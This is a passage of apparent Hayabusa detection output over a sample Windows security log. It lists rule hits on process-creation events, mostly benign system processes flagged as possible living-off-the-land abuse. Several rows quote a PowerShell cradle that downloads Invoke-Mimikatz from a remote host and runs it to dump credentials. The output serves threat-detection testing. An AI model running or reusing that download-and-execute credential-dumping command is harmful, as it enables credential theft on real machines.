0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:36:35.595 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:38:39.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:38:44.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:38:58.135 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:54:34.003 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask 
-RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:54:34.019 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:54:34.030 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:56:33.997 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:56:33.997 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 20:56:34.007 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 21:02:39.198 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 22:10:00.204 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 00:43:11.512 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 00:49:33.186 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 00:49:33.198 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.595 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.600 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.600 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:56.608 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:57.729 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:20:57.955 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.750 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN 
""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.752 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.760 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:00.892 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:21:01.001 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:22:11.163 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:22:11.319 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:22:11.397 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,high,,PowerShell Web Download and 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:15.759 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:37.371 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:31:37.402 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | 
User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 
+00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:08.574 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 
+00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:32:35.199 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 
+00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 15:34:22.339 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:01:09.840 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:10:18.012 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:46:13.438 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 16:46:13.445 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:54.267 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:54.269 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:55.299 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:44:55.315 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 21:45:05.616 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 22:11:54.571 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 23:12:04.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 23:21:01.785 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:09:17.586 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 01:10:55.594 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 02:00:00.609 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 02:01:59.600 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 03:05:36.607 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 04:00:34.614 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 04:15:14.072 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 04:15:14.084 +00:00,IE10Win7,4688,low,,Suspicious Cmd 